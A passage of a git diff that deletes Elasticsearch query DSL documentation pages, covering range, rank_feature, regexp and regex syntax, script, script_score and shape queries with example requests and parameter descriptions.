UTC offsets, such as `+01:00` or -`08:00`, and IANA -time zone IDs, such as `America/Los_Angeles`. - -For an example query using the `time_zone` parameter, see -<>. - -[NOTE] -==== -The `time_zone` parameter does **not** affect the <> value -of `now`. `now` is always the current system time in UTC. - -However, the `time_zone` parameter does convert dates calculated using `now` and -<>. For example, the `time_zone` parameter will -convert a value of `now/d`. -==== --- - -`boost`:: -+ --- -(Optional, float) Floating point number used to decrease or increase the -<> of a query. Defaults to `1.0`. - -You can use the `boost` parameter to adjust relevance scores for searches -containing two or more queries. - -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. --- - -[[range-query-notes]] -==== Notes - -[[ranges-on-text-and-keyword]] -===== Using the `range` query with `text` and `keyword` fields -Range queries on <> or <> fields will not be executed if -<> is set to false. - -[[ranges-on-dates]] -===== Using the `range` query with `date` fields - -When the `` parameter is a <> field data type, you can use -<> with the following parameters: - -* `gt` -* `gte` -* `lt` -* `lte` - -For example, the following search returns documents where the `timestamp` field -contains a date between today and yesterday. - -[source,console] ----- -GET /_search -{ - "query": { - "range": { - "timestamp": { - "gte": "now-1d/d", - "lt": "now/d" - } - } - } -} ----- - -[[missing-date-components]] -====== Missing date components - -For range queries and <> aggregations, {es} replaces missing date components with the following -values. Missing year components are not replaced. - -[source,text] ----- -MONTH_OF_YEAR: 01 -DAY_OF_MONTH: 01 -HOUR_OF_DAY: 23 -MINUTE_OF_HOUR: 59 -SECOND_OF_MINUTE: 59 -NANO_OF_SECOND: 999_999_999 ----- - -For example, if the format is `yyyy-MM`, {es} converts a `gt` value of `2099-12` -to `2099-12-01T23:59:59.999_999_999Z`. This date uses the provided year (`2099`) -and month (`12`) but uses the default day (`01`), hour (`23`), minute (`59`), -second (`59`), and nanosecond (`999_999_999`). - -[[range-query-date-math-rounding]] -====== Date math and rounding -{es} rounds <> values in parameters as follows: - -`gt`:: -+ --- -Rounds up to the first millisecond not covered by the rounded date. - -For example, `2014-11-18||/M` rounds up to `2014-12-01T00:00:00.000`, excluding -the entire month of November. --- - -`gte`:: -+ --- -Rounds down to the first millisecond. - -For example, `2014-11-18||/M` rounds down to `2014-11-01T00:00:00.000`, including -the entire month. --- - -`lt`:: -+ --- -Rounds down to the last millisecond before the rounded value. - -For example, `2014-11-18||/M` rounds down to `2014-10-31T23:59:59.999`, excluding -the entire month of November. --- - -`lte`:: -+ --- -Rounds up to the latest millisecond in the rounding interval. - -For example, `2014-11-18||/M` rounds up to `2014-11-30T23:59:59.999`, including -the entire month. --- - -[[range-query-time-zone]] -===== Example query using `time_zone` parameter - -You can use the `time_zone` parameter to convert `date` values to UTC using a -UTC offset. For example: - -[source,console] ----- -GET /_search -{ - "query": { - "range": { - "timestamp": { - "time_zone": "+01:00", <1> - "gte": "2020-01-01T00:00:00", <2> - "lte": "now" <3> - } - } - } -} ----- -// TEST[continued] - -<1> Indicates that `date` values use a UTC offset of `+01:00`. -<2> With a UTC offset of `+01:00`, {es} converts this date to -`2019-12-31T23:00:00 UTC`. -<3> The `time_zone` parameter does not affect the `now` value. diff --git a/docs/reference/query-dsl/rank-feature-query.asciidoc b/docs/reference/query-dsl/rank-feature-query.asciidoc deleted file mode 100644 index 1563a67bc03..00000000000 --- a/docs/reference/query-dsl/rank-feature-query.asciidoc +++ /dev/null @@ -1,313 +0,0 @@ -[[query-dsl-rank-feature-query]] -=== Rank feature query -++++ -Rank feature -++++ - -Boosts the <> of documents based on the -numeric value of a <> or -<> field. - -The `rank_feature` query is typically used in the `should` clause of a -<> query so its relevance scores are added to other -scores from the `bool` query. - -Unlike the <> query or other -ways to change <>, the -`rank_feature` query efficiently skips non-competitive hits when the -<> parameter is **not** `true`. This can -dramatically improve query speed. - -[[rank-feature-query-functions]] -==== Rank feature functions - -To calculate relevance scores based on rank feature fields, the `rank_feature` -query supports the following mathematical functions: - -* <> -* <> -* <> - -If you don't know where to start, we recommend using the `saturation` function. -If no function is provided, the `rank_feature` query uses the `saturation` -function by default. - -[[rank-feature-query-ex-request]] -==== Example request - -[[rank-feature-query-index-setup]] -===== Index setup - -To use the `rank_feature` query, your index must include a -<> or <> field -mapping. To see how you can set up an index for the `rank_feature` query, try -the following example. - -Create a `test` index with the following field mappings: - -- `pagerank`, a <> field which measures the -importance of a website -- `url_length`, a <> field which contains the -length of the website's URL. For this example, a long URL correlates negatively -to relevance, indicated by a `positive_score_impact` value of `false`. -- `topics`, a <> field which contains a list of -topics and a measure of how well each document is connected to this topic - -[source,console] ----- -PUT /test -{ - "mappings": { - "properties": { - "pagerank": { - "type": "rank_feature" - }, - "url_length": { - "type": "rank_feature", - "positive_score_impact": false - }, - "topics": { - "type": "rank_features" - } - } - } -} ----- -// TESTSETUP - - -Index several documents to the `test` index. - -[source,console] ----- -PUT /test/_doc/1?refresh -{ - "url": "https://en.wikipedia.org/wiki/2016_Summer_Olympics", - "content": "Rio 2016", - "pagerank": 50.3, - "url_length": 42, - "topics": { - "sports": 50, - "brazil": 30 - } -} - -PUT /test/_doc/2?refresh -{ - "url": "https://en.wikipedia.org/wiki/2016_Brazilian_Grand_Prix", - "content": "Formula One motor race held on 13 November 2016", - "pagerank": 50.3, - "url_length": 47, - "topics": { - "sports": 35, - "formula one": 65, - "brazil": 20 - } -} - -PUT /test/_doc/3?refresh -{ - "url": "https://en.wikipedia.org/wiki/Deadpool_(film)", - "content": "Deadpool is a 2016 American superhero film", - "pagerank": 50.3, - "url_length": 37, - "topics": { - "movies": 60, - "super hero": 65 - } -} ----- - -[[rank-feature-query-ex-query]] -===== Example query - -The following query searches for `2016` and boosts relevance scores based on -`pagerank`, `url_length`, and the `sports` topic. - -[source,console] ----- -GET /test/_search -{ - "query": { - "bool": { - "must": [ - { - "match": { - "content": "2016" - } - } - ], - "should": [ - { - "rank_feature": { - "field": "pagerank" - } - }, - { - "rank_feature": { - "field": "url_length", - "boost": 0.1 - } - }, - { - "rank_feature": { - "field": "topics.sports", - "boost": 0.4 - } - } - ] - } - } -} ----- - - -[[rank-feature-top-level-params]] -==== Top-level parameters for `rank_feature` - -`field`:: -(Required, string) <> or -<> field used to boost -<>. - -`boost`:: -+ --- -(Optional, float) Floating point number used to decrease or increase -<>. Defaults to `1.0`. - -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. --- - -`saturation`:: -+ --- -(Optional, <>) Saturation -function used to boost <> based on the -value of the rank feature `field`. If no function is provided, the `rank_feature` -query defaults to the `saturation` function. See -<> for more information. - -Only one function `saturation`, `log`, or `sigmoid` can be provided. --- - -`log`:: -+ --- -(Optional, <>) Logarithmic -function used to boost <> based on the -value of the rank feature `field`. See -<> for more information. - -Only one function `saturation`, `log`, or `sigmoid` can be provided. --- - -`sigmoid`:: -+ --- -(Optional, <>) Sigmoid function used -to boost <> based on the value of the -rank feature `field`. See <> for more -information. - -Only one function `saturation`, `log`, or `sigmoid` can be provided. --- - - -[[rank-feature-query-notes]] -==== Notes - -[[rank-feature-query-saturation]] -===== Saturation -The `saturation` function gives a score equal to `S / (S + pivot)`, where `S` is -the value of the rank feature field and `pivot` is a configurable pivot value so -that the result will be less than `0.5` if `S` is less than pivot and greater -than `0.5` otherwise. Scores are always `(0,1)`. - -If the rank feature has a negative score impact then the function will be -computed as `pivot / (S + pivot)`, which decreases when `S` increases. - -[source,console] --------------------------------------------------- -GET /test/_search -{ - "query": { - "rank_feature": { - "field": "pagerank", - "saturation": { - "pivot": 8 - } - } - } -} --------------------------------------------------- - -If a `pivot` value is not provided, {es} computes a default value equal to the -approximate geometric mean of all rank feature values in the index. We recommend -using this default value if you haven't had the opportunity to train a good -pivot value. - -[source,console] --------------------------------------------------- -GET /test/_search -{ - "query": { - "rank_feature": { - "field": "pagerank", - "saturation": {} - } - } -} --------------------------------------------------- - -[[rank-feature-query-logarithm]] -===== Logarithm -The `log` function gives a score equal to `log(scaling_factor + S)`, where `S` -is the value of the rank feature field and `scaling_factor` is a configurable -scaling factor. Scores are unbounded. - -This function only supports rank features that have a positive score impact. - -[source,console] --------------------------------------------------- -GET /test/_search -{ - "query": { - "rank_feature": { - "field": "pagerank", - "log": { - "scaling_factor": 4 - } - } - } -} --------------------------------------------------- - -[[rank-feature-query-sigmoid]] -===== Sigmoid -The `sigmoid` function is an extension of `saturation` which adds a configurable -exponent. Scores are computed as `S^exp^ / (S^exp^ + pivot^exp^)`. Like for the -`saturation` function, `pivot` is the value of `S` that gives a score of `0.5` -and scores are `(0,1)`. - -The `exponent` must be positive and is typically in `[0.5, 1]`. A -good value should be computed via training. If you don't have the opportunity to -do so, we recommend you use the `saturation` function instead. - -[source,console] --------------------------------------------------- -GET /test/_search -{ - "query": { - "rank_feature": { - "field": "pagerank", - "sigmoid": { - "pivot": 7, - "exponent": 0.6 - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/regexp-query.asciidoc b/docs/reference/query-dsl/regexp-query.asciidoc deleted file mode 100644 index 480809ce135..00000000000 --- a/docs/reference/query-dsl/regexp-query.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[query-dsl-regexp-query]] -=== Regexp query -++++ -Regexp -++++ - -Returns documents that contain terms matching a -{wikipedia}/Regular_expression[regular expression]. - -A regular expression is a way to match patterns in data using placeholder -characters, called operators. For a list of operators supported by the -`regexp` query, see <>. - -[[regexp-query-ex-request]] -==== Example request - -The following search returns documents where the `user.id` field contains any term -that begins with `k` and ends with `y`. The `.*` operators match any -characters of any length, including no characters. Matching -terms can include `ky`, `kay`, and `kimchy`. - -[source,console] ----- -GET /_search -{ - "query": { - "regexp": { - "user.id": { - "value": "k.*y", - "flags": "ALL", - "case_insensitive": true, - "max_determinized_states": 10000, - "rewrite": "constant_score" - } - } - } -} ----- - - -[[regexp-top-level-params]] -==== Top-level parameters for `regexp` -``:: -(Required, object) Field you wish to search. - -[[regexp-query-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Regular expression for terms you wish to find in the provided -``. For a list of supported operators, see <>. -+ --- -By default, regular expressions are limited to 1,000 characters. You can change -this limit using the <> -setting. - -[WARNING] -===== -The performance of the `regexp` query can vary based on the regular expression -provided. To improve performance, avoid using wildcard patterns, such as `.*` or -`.*?+`, without a prefix or suffix. -===== --- - -`flags`:: -(Optional, string) Enables optional operators for the regular expression. For -valid values and more information, see <>. - -`case_insensitive`:: -(Optional, Boolean) allows case insensitive matching of the regular expression -value with the indexed field values when set to true. Default is false which means -the case sensitivity of matching depends on the underlying field's mapping. - -`max_determinized_states`:: -+ --- -(Optional, integer) Maximum number of -{wikipedia}/Deterministic_finite_automaton[automaton states] -required for the query. Default is `10000`. - -{es} uses https://lucene.apache.org/core/[Apache Lucene] internally to parse -regular expressions. Lucene converts each regular expression to a finite -automaton containing a number of determinized states. - -You can use this parameter to prevent that conversion from unintentionally -consuming too many resources. You may need to increase this limit to run complex -regular expressions. --- - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more -information, see the <>. - -[[regexp-query-notes]] -==== Notes -===== Allow expensive queries -Regexp queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/regexp-syntax.asciidoc b/docs/reference/query-dsl/regexp-syntax.asciidoc deleted file mode 100644 index 57c8c9d35b8..00000000000 --- a/docs/reference/query-dsl/regexp-syntax.asciidoc +++ /dev/null @@ -1,224 +0,0 @@ -[[regexp-syntax]] -== Regular expression syntax - -A {wikipedia}/Regular_expression[regular expression] is a way to -match patterns in data using placeholder characters, called operators. - -{es} supports regular expressions in the following queries: - -* <> -* <> - -{es} uses https://lucene.apache.org/core/[Apache Lucene]'s regular expression -engine to parse these queries. - -[discrete] -[[regexp-reserved-characters]] -=== Reserved characters -Lucene's regular expression engine supports all Unicode characters. However, the -following characters are reserved as operators: - -.... -. ? + * | { } [ ] ( ) " \ -.... - -Depending on the <> enabled, the -following characters may also be reserved: - -.... -# @ & < > ~ -.... - -To use one of these characters literally, escape it with a preceding -backslash or surround it with double quotes. For example: - -.... -\@ # renders as a literal '@' -\\ # renders as a literal '\' -"john@smith.com" # renders as 'john@smith.com' -.... - - -[discrete] -[[regexp-standard-operators]] -=== Standard operators - -Lucene's regular expression engine does not use the -{wikipedia}/Perl_Compatible_Regular_Expressions[Perl -Compatible Regular Expressions (PCRE)] library, but it does support the -following standard operators. - -`.`:: -+ --- -Matches any character. For example: - -.... -ab. # matches 'aba', 'abb', 'abz', etc. -.... --- - -`?`:: -+ --- -Repeat the preceding character zero or one times. Often used to make the -preceding character optional. For example: - -.... -abc? # matches 'ab' and 'abc' -.... --- - -`+`:: -+ --- -Repeat the preceding character one or more times. For example: - -.... -ab+ # matches 'ab', 'abb', 'abbb', etc. -.... --- - -`*`:: -+ --- -Repeat the preceding character zero or more times. For example: - -.... -ab* # matches 'a', 'ab', 'abb', 'abbb', etc. -.... --- - -`{}`:: -+ --- -Minimum and maximum number of times the preceding character can repeat. For -example: - -.... -a{2} # matches 'aa' -a{2,4} # matches 'aa', 'aaa', and 'aaaa' -a{2,} # matches 'a` repeated two or more times -.... --- - -`|`:: -+ --- -OR operator. The match will succeed if the longest pattern on either the left -side OR the right side matches. For example: -.... -abc|xyz # matches 'abc' and 'xyz' -.... --- - -`( … )`:: -+ --- -Forms a group. You can use a group to treat part of the expression as a single -character. For example: - -.... -abc(def)? # matches 'abc' and 'abcdef' but not 'abcd' -.... --- - -`[ … ]`:: -+ --- -Match one of the characters in the brackets. For example: - -.... -[abc] # matches 'a', 'b', 'c' -.... - -Inside the brackets, `-` indicates a range unless `-` is the first character or -escaped. For example: - -.... -[a-c] # matches 'a', 'b', or 'c' -[-abc] # '-' is first character. Matches '-', 'a', 'b', or 'c' -[abc\-] # Escapes '-'. Matches 'a', 'b', 'c', or '-' -.... - -A `^` before a character in the brackets negates the character or range. For -example: - -.... -[^abc] # matches any character except 'a', 'b', or 'c' -[^a-c] # matches any character except 'a', 'b', or 'c' -[^-abc] # matches any character except '-', 'a', 'b', or 'c' -[^abc\-] # matches any character except 'a', 'b', 'c', or '-' -.... --- - -[discrete] -[[regexp-optional-operators]] -=== Optional operators - -You can use the `flags` parameter to enable more optional operators for -Lucene's regular expression engine. - -To enable multiple operators, use a `|` separator. For example, a `flags` value -of `COMPLEMENT|INTERVAL` enables the `COMPLEMENT` and `INTERVAL` operators. - -[discrete] -==== Valid values - -`ALL` (Default):: -Enables all optional operators. - -`COMPLEMENT`:: -+ --- -Enables the `~` operator. You can use `~` to negate the shortest following -pattern. For example: - -.... -a~bc # matches 'adc' and 'aec' but not 'abc' -.... --- - -`INTERVAL`:: -+ --- -Enables the `<>` operators. You can use `<>` to match a numeric range. For -example: - -.... -foo<1-100> # matches 'foo1', 'foo2' ... 'foo99', 'foo100' -foo<01-100> # matches 'foo01', 'foo02' ... 'foo99', 'foo100' -.... --- - -`INTERSECTION`:: -+ --- -Enables the `&` operator, which acts as an AND operator. The match will succeed -if patterns on both the left side AND the right side matches. For example: - -.... -aaa.+&.+bbb # matches 'aaabbb' -.... --- - -`ANYSTRING`:: -+ --- -Enables the `@` operator. You can use `@` to match any entire -string. - -You can combine the `@` operator with `&` and `~` operators to create an -"everything except" logic. For example: - -.... -@&~(abc.+) # matches everything except terms beginning with 'abc' -.... --- - -[discrete] -[[regexp-unsupported-operators]] -=== Unsupported operators -Lucene's regular expression engine does not support anchor operators, such as -`^` (beginning of line) or `$` (end of line). To match a term, the regular -expression must match the entire string. diff --git a/docs/reference/query-dsl/script-query.asciidoc b/docs/reference/query-dsl/script-query.asciidoc deleted file mode 100644 index cba078b5fc2..00000000000 --- a/docs/reference/query-dsl/script-query.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[query-dsl-script-query]] -=== Script query -++++ -Script -++++ - -Filters documents based on a provided <>. The -`script` query is typically used in a <>. - -WARNING: Using scripts can result in slower search speeds. See -<>. - - -[[script-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "bool": { - "filter": { - "script": { - "script": { - "source": "doc['num1'].value > 1", - "lang": "painless" - } - } - } - } - } -} ----- - - -[[script-top-level-params]] -==== Top-level parameters for `script` - -`script`:: -(Required, <>) Contains a script to run -as a query. This script must return a boolean value, `true` or `false`. - -[[script-query-notes]] -==== Notes - -[[script-query-custom-params]] -===== Custom Parameters - -Like <>, scripts are cached for faster execution. -If you frequently change the arguments of a script, we recommend you store them -in the script's `params` parameter. For example: - -[source,console] ----- -GET /_search -{ - "query": { - "bool": { - "filter": { - "script": { - "script": { - "source": "doc['num1'].value > params.param1", - "lang": "painless", - "params": { - "param1": 5 - } - } - } - } - } - } -} ----- - -===== Allow expensive queries -Script queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/script-score-query.asciidoc b/docs/reference/query-dsl/script-score-query.asciidoc deleted file mode 100644 index 56930ba1252..00000000000 --- a/docs/reference/query-dsl/script-score-query.asciidoc +++ /dev/null @@ -1,369 +0,0 @@ -[[query-dsl-script-score-query]] -=== Script score query -++++ -Script score -++++ - -Uses a <> to provide a custom score for returned -documents. - -The `script_score` query is useful if, for example, a scoring function is expensive and you only need to calculate the score of a filtered set of documents. - - -[[script-score-query-ex-request]] -==== Example request -The following `script_score` query assigns each returned document a score equal to the `my-int` field value divided by `10`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "script_score": { - "query": { - "match": { "message": "elasticsearch" } - }, - "script": { - "source": "doc['my-int'].value / 10 " - } - } - } -} --------------------------------------------------- - - -[[script-score-top-level-params]] -==== Top-level parameters for `script_score` -`query`:: -(Required, query object) Query used to return documents. - -`script`:: -+ --- -(Required, <>) Script used to compute the score of documents returned by the `query`. - -IMPORTANT: Final relevance scores from the `script_score` query cannot be -negative. To support certain search optimizations, Lucene requires -scores be positive or `0`. --- - -`min_score`:: -(Optional, float) Documents with a score lower -than this floating point number are excluded from the search results. - -`boost`:: -(Optional, float) Documents' scores produced by `script` are -multiplied by `boost` to produce final documents' scores. Defaults to `1.0`. - -[[script-score-query-notes]] -==== Notes - -[[script-score-access-scores]] -===== Use relevance scores in a script - -Within a script, you can -{ref}/modules-scripting-fields.html#scripting-score[access] -the `_score` variable which represents the current relevance score of a -document. - -[[script-score-predefined-functions]] -===== Predefined functions -You can use any of the available {painless}/painless-contexts.html[painless -functions] in your `script`. You can also use the following predefined functions -to customize scoring: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -We suggest using these predefined functions instead of writing your own. -These functions take advantage of efficiencies from {es}' internal mechanisms. - -[[script-score-saturation]] -====== Saturation -`saturation(value,k) = value/(k + value)` - -[source,js] --------------------------------------------------- -"script" : { - "source" : "saturation(doc['my-int'].value, 1)" -} --------------------------------------------------- -// NOTCONSOLE - -[[script-score-sigmoid]] -====== Sigmoid -`sigmoid(value, k, a) = value^a/ (k^a + value^a)` - -[source,js] --------------------------------------------------- -"script" : { - "source" : "sigmoid(doc['my-int'].value, 2, 1)" -} --------------------------------------------------- -// NOTCONSOLE - -[[random-score-function]] -====== Random score function -`random_score` function generates scores that are uniformly distributed -from 0 up to but not including 1. - -`randomScore` function has the following syntax: -`randomScore(, )`. -It has a required parameter - `seed` as an integer value, -and an optional parameter - `fieldName` as a string value. - -[source,js] --------------------------------------------------- -"script" : { - "source" : "randomScore(100, '_seq_no')" -} --------------------------------------------------- -// NOTCONSOLE - -If the `fieldName` parameter is omitted, the internal Lucene -document ids will be used as a source of randomness. This is very efficient, -but unfortunately not reproducible since documents might be renumbered -by merges. - -[source,js] --------------------------------------------------- -"script" : { - "source" : "randomScore(100)" -} --------------------------------------------------- -// NOTCONSOLE - -Note that documents that are within the same shard and have the -same value for field will get the same score, so it is usually desirable -to use a field that has unique values for all documents across a shard. -A good default choice might be to use the `_seq_no` -field, whose only drawback is that scores will change if the document is -updated since update operations also update the value of the `_seq_no` field. - - -[[decay-functions-numeric-fields]] -====== Decay functions for numeric fields -You can read more about decay functions -{ref}/query-dsl-function-score-query.html#function-decay[here]. - -* `double decayNumericLinear(double origin, double scale, double offset, double decay, double docValue)` -* `double decayNumericExp(double origin, double scale, double offset, double decay, double docValue)` -* `double decayNumericGauss(double origin, double scale, double offset, double decay, double docValue)` - -[source,js] --------------------------------------------------- -"script" : { - "source" : "decayNumericLinear(params.origin, params.scale, params.offset, params.decay, doc['dval'].value)", - "params": { <1> - "origin": 20, - "scale": 10, - "decay" : 0.5, - "offset" : 0 - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Using `params` allows to compile the script only once, even if params change. - -[[decay-functions-geo-fields]] -====== Decay functions for geo fields - -* `double decayGeoLinear(String originStr, String scaleStr, String offsetStr, double decay, GeoPoint docValue)` - -* `double decayGeoExp(String originStr, String scaleStr, String offsetStr, double decay, GeoPoint docValue)` - -* `double decayGeoGauss(String originStr, String scaleStr, String offsetStr, double decay, GeoPoint docValue)` - -[source,js] --------------------------------------------------- -"script" : { - "source" : "decayGeoExp(params.origin, params.scale, params.offset, params.decay, doc['location'].value)", - "params": { - "origin": "40, -70.12", - "scale": "200km", - "offset": "0km", - "decay" : 0.2 - } -} --------------------------------------------------- -// NOTCONSOLE - -[[decay-functions-date-fields]] -====== Decay functions for date fields - -* `double decayDateLinear(String originStr, String scaleStr, String offsetStr, double decay, JodaCompatibleZonedDateTime docValueDate)` - -* `double decayDateExp(String originStr, String scaleStr, String offsetStr, double decay, JodaCompatibleZonedDateTime docValueDate)` - -* `double decayDateGauss(String originStr, String scaleStr, String offsetStr, double decay, JodaCompatibleZonedDateTime docValueDate)` - -[source,js] --------------------------------------------------- -"script" : { - "source" : "decayDateGauss(params.origin, params.scale, params.offset, params.decay, doc['date'].value)", - "params": { - "origin": "2008-01-01T01:00:00Z", - "scale": "1h", - "offset" : "0", - "decay" : 0.5 - } -} --------------------------------------------------- -// NOTCONSOLE - -NOTE: Decay functions on dates are limited to dates in the default format -and default time zone. Also calculations with `now` are not supported. - -[[script-score-functions-vector-fields]] -====== Functions for vector fields -<> are accessible through -`script_score` query. - -===== Allow expensive queries -Script score queries will not be executed if <> -is set to false. - -[[script-score-faster-alt]] -===== Faster alternatives -The `script_score` query calculates the score for -every matching document, or hit. There are faster alternative query types that -can efficiently skip non-competitive hits: - -* If you want to boost documents on some static fields, use the - <> query. - * If you want to boost documents closer to a date or geographic point, use the - <> query. - -[[script-score-function-score-transition]] -===== Transition from the function score query -We are deprecating the <> -query. We recommend using the `script_score` query instead. - -You can implement the following functions from the `function_score` query using -the `script_score` query: - -* <> -* <> -* <> -* <> -* <> - -[[script-score]] -====== `script_score` -What you used in `script_score` of the Function Score query, you -can copy into the Script Score query. No changes here. - -[[weight]] -====== `weight` -`weight` function can be implemented in the Script Score query through -the following script: - -[source,js] --------------------------------------------------- -"script" : { - "source" : "params.weight * _score", - "params": { - "weight": 2 - } -} --------------------------------------------------- -// NOTCONSOLE - -[[random-score]] -====== `random_score` - -Use `randomScore` function -as described in <>. - -[[field-value-factor]] -====== `field_value_factor` -`field_value_factor` function can be easily implemented through script: - -[source,js] --------------------------------------------------- -"script" : { - "source" : "Math.log10(doc['field'].value * params.factor)", - "params" : { - "factor" : 5 - } -} --------------------------------------------------- -// NOTCONSOLE - - -For checking if a document has a missing value, you can use -`doc['field'].size() == 0`. For example, this script will use -a value `1` if a document doesn't have a field `field`: - -[source,js] --------------------------------------------------- -"script" : { - "source" : "Math.log10((doc['field'].size() == 0 ? 1 : doc['field'].value()) * params.factor)", - "params" : { - "factor" : 5 - } -} --------------------------------------------------- -// NOTCONSOLE - -This table lists how `field_value_factor` modifiers can be implemented -through a script: - -[cols="<,<",options="header",] -|======================================================================= -| Modifier | Implementation in Script Score - -| `none` | - -| `log` | `Math.log10(doc['f'].value)` -| `log1p` | `Math.log10(doc['f'].value + 1)` -| `log2p` | `Math.log10(doc['f'].value + 2)` -| `ln` | `Math.log(doc['f'].value)` -| `ln1p` | `Math.log(doc['f'].value + 1)` -| `ln2p` | `Math.log(doc['f'].value + 2)` -| `square` | `Math.pow(doc['f'].value, 2)` -| `sqrt` | `Math.sqrt(doc['f'].value)` -| `reciprocal` | `1.0 / doc['f'].value` -|======================================================================= - -[[decay-functions]] -====== `decay` functions -The `script_score` query has equivalent <> -that can be used in script. - -include::{es-repo-dir}/vectors/vector-functions.asciidoc[] - -[[score-explanation]] -====== Explain request -Using an <> provides an explanation of how the parts of a score were computed. The `script_score` query can add its own explanation by setting the `explanation` parameter: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_explain/0 -{ - "query": { - "script_score": { - "query": { - "match": { "message": "elasticsearch" } - }, - "script": { - "source": """ - long count = doc['count'].value; - double normalizedCount = count / 10; - if (explanation != null) { - explanation.set('normalized count = count / 10 = ' + count + ' / 10 = ' + normalizedCount); - } - return normalizedCount; - """ - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Note that the `explanation` will be null when using in a normal `_search` request, so having a conditional guard is best practice. diff --git a/docs/reference/query-dsl/shape-queries.asciidoc b/docs/reference/query-dsl/shape-queries.asciidoc deleted file mode 100644 index 2e44069c066..00000000000 --- a/docs/reference/query-dsl/shape-queries.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[shape-queries]] -[role="xpack"] -[testenv="basic"] -== Shape queries - - -Like <> Elasticsearch supports the ability to index -arbitrary two dimension (non Geospatial) geometries making it possible to -map out virtual worlds, sporting venues, theme parks, and CAD diagrams. - -Elasticsearch supports two types of cartesian data: -<> fields which support x/y pairs, and -<> fields, which support points, lines, circles, polygons, multi-polygons, etc. - -The queries in this group are: - -<> query:: -Finds documents with: -* `shapes` which either intersect, are contained by, are within or do not intersect -with the specified shape -* `points` which intersect the specified shape - -include::shape-query.asciidoc[] diff --git a/docs/reference/query-dsl/shape-query.asciidoc b/docs/reference/query-dsl/shape-query.asciidoc deleted file mode 100644 index 86ec64ff08e..00000000000 --- a/docs/reference/query-dsl/shape-query.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[query-dsl-shape-query]] -[role="xpack"] -[testenv="basic"] -=== Shape query -++++ -Shape -++++ - -Queries documents that contain fields indexed using the `shape` type. - -Requires the <>. - -The query supports two ways of defining the target shape, either by -providing a whole shape definition, or by referencing the name, or id, of a shape -pre-indexed in another index. Both formats are defined below with -examples. - -==== Inline Shape Definition - -Similar to the `geo_shape` query, the `shape` query uses -http://geojson.org[GeoJSON] or -{wikipedia}/Well-known_text_representation_of_geometry[Well Known Text] -(WKT) to represent shapes. - -Given the following index: - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "geometry": { - "type": "shape" - } - } - } -} - -PUT /example/_doc/1?refresh=wait_for -{ - "name": "Lucky Landing", - "geometry": { - "type": "point", - "coordinates": [ 1355.400544, 5255.530286 ] - } -} --------------------------------------------------- -// TESTSETUP - -The following query will find the point using the Elasticsearch's -`envelope` GeoJSON extension: - -[source,console] --------------------------------------------------- -GET /example/_search -{ - "query": { - "shape": { - "geometry": { - "shape": { - "type": "envelope", - "coordinates": [ [ 1355.0, 5355.0 ], [ 1400.0, 5200.0 ] ] - }, - "relation": "within" - } - } - } -} --------------------------------------------------- - -//// -[source,console-result] --------------------------------------------------- -{ - "took": 3, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 0.0, - "hits": [ - { - "_index": "example", - "_type": "_doc", - "_id": "1", - "_score": 0.0, - "_source": { - "name": "Lucky Landing", - "geometry": { - "type": "point", - "coordinates": [ - 1355.400544, - 5255.530286 - ] - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 3/"took": $body.took/] -//// - -==== Pre-Indexed Shape - -The Query also supports using a shape which has already been indexed in -another index. This is particularly useful for when -you have a pre-defined list of shapes which are useful to your -application and you want to reference this using a logical name (for -example 'New Zealand') rather than having to provide their coordinates -each time. In this situation it is only necessary to provide: - -* `id` - The ID of the document that containing the pre-indexed shape. -* `index` - Name of the index where the pre-indexed shape is. Defaults -to 'shapes'. -* `path` - The field specified as path containing the pre-indexed shape. -Defaults to 'shape'. -* `routing` - The routing of the shape document if required. - -The following is an example of using the Filter with a pre-indexed -shape: - -[source,console] --------------------------------------------------- -PUT /shapes -{ - "mappings": { - "properties": { - "geometry": { - "type": "shape" - } - } - } -} - -PUT /shapes/_doc/footprint -{ - "geometry": { - "type": "envelope", - "coordinates": [ [ 1355.0, 5355.0 ], [ 1400.0, 5200.0 ] ] - } -} - -GET /example/_search -{ - "query": { - "shape": { - "geometry": { - "indexed_shape": { - "index": "shapes", - "id": "footprint", - "path": "geometry" - } - } - } - } -} --------------------------------------------------- - -==== Spatial Relations - -The following is a complete list of spatial relation operators available: - -* `INTERSECTS` - (default) Return all documents whose `shape` field -intersects the query geometry. -* `DISJOINT` - Return all documents whose `shape` field -has nothing in common with the query geometry. -* `WITHIN` - Return all documents whose `shape` field -is within the query geometry. -* `CONTAINS` - Return all documents whose `shape` field -contains the query geometry. - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. diff --git a/docs/reference/query-dsl/simple-query-string-query.asciidoc b/docs/reference/query-dsl/simple-query-string-query.asciidoc deleted file mode 100644 index 7b79e82f9ab..00000000000 --- a/docs/reference/query-dsl/simple-query-string-query.asciidoc +++ /dev/null @@ -1,309 +0,0 @@ -[[query-dsl-simple-query-string-query]] -=== Simple query string query -++++ -Simple query string -++++ - -Returns documents based on a provided query string, using a parser with a -limited but fault-tolerant syntax. - -This query uses a <> to parse and -split the provided query string into terms based on special operators. The query -then <> each term 